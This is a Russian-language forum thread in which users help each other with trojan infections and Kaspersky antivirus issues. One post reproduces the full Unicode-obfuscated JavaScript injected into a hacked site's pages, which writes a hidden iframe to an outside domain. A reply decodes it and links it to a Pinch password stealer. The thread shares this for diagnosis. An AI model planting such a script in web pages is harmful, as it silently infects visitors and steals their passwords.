Перейти к содержанию

Троян с "Вечной жизнью"


Рекомендуемые сообщения

  akoK сказал:
н-даа и по каким помойкам Вас носило....новье (хорошо, что это решаемо)

 

Где только не носило;)

Все это скорее всего от взломанного ПО скачанного с инета.

Ссылка на комментарий
Поделиться на другие сайты

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

 

P>S> Все уехало в вирлаб.

Ссылка на комментарий
Поделиться на другие сайты

  akoK сказал:
Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

Логично. На днях "взломали/украли пароли/др.варианты" мои сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

 

<script type="text/javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script>

 

 

И у меня еще проблема:

В C:\Documents and Settings\Admin (основной пользователь) время от времени появляется файл WIN.EXE , вирусов вроде нет, в процессы не лезет, я его удаляю, а он снова...

win.rarПолучение информации...

 

Восстановление значка "Свернуть все окна":

  Цитата
Создай текстовый файл и туда скопируй:

 

[shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

 

После сохраняй как Свернуть все окна.scf

А лучше пользуйтесь WinKey+D - проще

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

  akoK сказал:
Почему, это по версии касперского.

У меня KIS 7.0.0.125 de с базами от 4.04.08 8:20 - не определяет

а с базами 4.04.08 19:22 - определяет, Убедили!

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

  Цитата
В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

<script type="text/javascript">

document.write('\u003c\u......');

</script>

 

хм... расшифровываться как:

<iframe src=http://atomakayan*.biz*/afterftpchek/0104/index.php width=1 height=1 style="display:none"></iframe>

и грузиться в теории этот файл:

atomakayan.biz/my/load***.exe

(звездочки в код я вставил специально, что бы никто нечаянно не сделал контрл+с и контрл+в и ентер. т.е код - без них)))

 

 

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Изменено пользователем vidocq89
Ссылка на комментарий
Поделиться на другие сайты

  NoAdmin сказал:
- Пропали значки "Спам", "Не спам" в Outlook Express

 

Удаление KIS и повторная установка - результат не дали.

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

  Цитата
файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Пинч...значит пароли тю-тю...необходимо менять.

 

baseeopiq32.dll - Trojan.Win32.SubSys.ca

Ссылка на комментарий
Поделиться на другие сайты

  akoK сказал:
Пинч...значит пароли тю-тю...необходимо менять.

 

Да последнее время только этим и занимаемся! Спасибо!

 

 

  NoAdmin сказал:
- Пропали значки "Спам", "Не спам" в Outlook Express

 

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Ссылка на комментарий
Поделиться на другие сайты

  NoAdmin сказал:
Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Добро пожаловать на форум! У меня была похожая проблема. Непомню как решил, но попропую посоетовать то, что делал я сам. Для начала Настройки-> Антиспам-> "Включить поддержку MS Outlook и т.д." и "Открывать Диспетчер писем при получении почты" галки снимаем. Далее ставим по умолчанию в панели управения почтовый клиент офис аутлук (если есть МС Офис), перезагружаемся. Потом ставим обратно галки в каспере которые сняли ранее, ставим обратно почтовый клиент по умолчанию аутлук экспресс, и запускаем его и смотрим.

Ссылка на комментарий
Поделиться на другие сайты

  JIABP сказал:
Добро пожаловать на форум!

Спасибо!

 

Снял птицы в KIS

Открыл Оутлук Офис - установил почтой по умолчанию

Перезагрузка ОС

Установил птицы в KIS

Открыл Оутлук Экспресс - установил почтой по умолчанию

Перезагрузил

 

Безрезультатно

 

Помогло только:

Удалить Касперского утилитой http://http://forum.kasperskyclub.ru/index...ost&id=4321 и снова установите 325ю или новее

Вопрос снят

 

Всем Спасибо

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

NoAdmin, поздравляю с решением проблемы! = ) Но ссылка которую Вы дали ведёт на главную страницу = ( Можно конкретную линку?

 

P.S. Спасибо, буду знать как лечить данную траблу в будущем = )

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Maksum
      Автор Maksum
      Скачал вирус в папку temp и %temp%
      Через несколько дней появилось несколько троянов.
      Во время игры, игра свернулась и вышло окно от некого хакера и было написано напиши мне я быстро перезагрузил пк, вошёл в безопасный режим  и начал чистить его с помощью Dr web как очистил трояны ноутбук начал лагать но без троянов чуть позже перепроверил им же оказалось опять появились те же трояны. Теперь даже боюсь лишний раз ноут включать(
      Скиньте пожалуйста скрипт для avz.
      Мой виндовс: 10 домашняя версия для 1 языка 64 бит
      Вот файл с троянами:
      Fitnes.rar
    • RedKaroliner
      Автор RedKaroliner
      Здравствуйте!
      Использовал антивирус Касперского 3 раза. После первого и второго сканирования он показывал наличие троянов, я выбирал везде пункт "удалить". В третий раз после сканирования ничего не обнаружил. Хотелось бы понять, остались ли на компьютере трояны, или он чист.
      CollectionLog-2025.03.24-17.46.zip
    • Егоррр
      Автор Егоррр
      Решил на свою голову скачать книгу в электронном виде. Теперь не могу избавиться. Отчет предоставлен от программы Farbar Recovery Scan Tool. Компьютер страшно тормозит. Делать что либо не возможно. С горе пополам скачал kaspersky tools и Dr.web. Удалить не получилось 

      отчет.rar
    • orpham
      Автор orpham
      Добрый день.
      15.02 вечером, зашифровало все файлы. Комп настроен для удаленного подключения по RDP, включен круглосуточно. Все файлы с расширением .kwx8/
      Помогите пож-та.
      Лог сканирования KVRT во вложении.
      report_2025.02.17_15.55.29.klr.rar
    • Serhio0606
      Автор Serhio0606
      Здравствуйте, столкнулся с такой проблемой. На компьютере подхватил вирус, предполагаю, что майнер. Он маскируется под проводник explorer.exe и его не видит ни один антивирус, когда нажимаю расположение файла, переходит на обыкновенный проводник, но это вирус: во первых при всех закрытых приложениях (и в трее) по какой-то причине он всегда стабильно загружает процессор на 30% и конечно же при входе в диспетчер задач резко перестаёт, также я читал, что в диспетчере задач не может быть более одного проводника, а у меня их два. При закрытии задачи или перезагрузки компьютер полностью перезагружается (мгновенно выключается). Но по видимому он не самый мощный (вирус) и он не умеет как более продвинутые закрывать диспетчер задач через время, и можно пользоваться компьютером с открытым диспетчером. Так же ещё после него почему-то не всегда запускается, видимо совсем не качественный. Но при открытии диспетчера задач, во вкладке сведения, он не появляется в состоянии приостановлен, как делают некоторые майнеры, а видимо просто по тихому прекращает работать, но остаётся активным съедая максимум 1% цп. Но при всех нюансах он никаким пока, что образом не исчез, удалился и т.п. Пробовал кучу разных антивирусов с разными функциями и не один его не видит. Прошу помочь, но думаю уже просто не морочиться и снести винду.


      CollectionLog-2025.04.06-22.46.zip
×
×
  • Создать...